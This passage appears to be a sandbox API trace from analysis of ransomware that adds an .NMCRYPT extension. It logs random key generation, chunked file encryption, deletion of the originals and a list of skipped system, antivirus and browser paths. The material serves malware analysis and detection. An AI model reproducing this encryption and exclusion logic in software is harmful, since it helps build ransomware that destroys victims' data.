out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.635] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.635] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0147.635] CryptHashData (hHash=0x9ad178, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.635] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad278) returned 1 [0147.635] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.635] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.635] wcslen (_String="\\\\?\\") returned 0x4 [0147.635] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4f8) returned 1 [0147.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.636] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2568) returned 1 [0147.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.638] GetLastError () returned 0x0 [0147.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.665] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.665] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.665] GetLastError () returned 0x0 [0147.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.665] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.665] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.665] GetLastError () returned 0x0 [0147.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.665] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.665] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.665] GetLastError () returned 0x0 [0147.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.666] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.666] GetLastError () returned 0x0 [0147.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x8, lpOverlapped=0x0) returned 1 [0147.667] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x8, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0147.667] GetLastError () returned 0x0 [0147.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0147.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0x20 [0147.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml", dwFileAttributes=0x20) returned 0 [0147.667] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 1 [0147.667] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0 [0147.668] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" [0147.668] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.668] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3c0.tmp")) returned 0xb3c0 [0147.668] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3c0.tmp"), dwFlags=0x1) returned 0 [0147.669] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3c0.tmp")) returned 1 [0147.669] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0147.669] wcslen (_String="OK") returned 0x2 [0147.669] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.669] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.669] CryptDestroyKey (hKey=0x9ad278) returned 1 [0147.669] CryptDestroyHash (hHash=0x9ad178) returned 1 [0147.669] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0147.669] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll", pszSpec="*NMCRYPT") returned 0 [0147.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll", pszSpec="*Recovers your files.html") returned 0 [0147.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll", pszSpec="*.exe") returned 0 [0147.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll", pszSpec="*.dll") returned 1 [0147.669] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*NMCRYPT") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*Recovers your files.html") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.exe") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.dll") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.lnk") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.bat") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.ini") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.msi") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*.scf") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*pagefile.sys*") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*AppData*") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\winrar\\*") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.669] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\java\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\windows\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\ESET\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\AVG\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*Atheros*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*Realtek*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*bootmgr*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*boot*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*boot*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*IO.SYS*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*ntldr*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*chrome*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*opera*") returned 0 [0147.670] PathMatchSpecW (pszFile="ipsnld.xml", pszSpec="*firefox*") returned 0 [0147.670] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", pszSpec="*") returned 1 [0147.670] strlen (_Str="NMoreira") returned 0x8 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 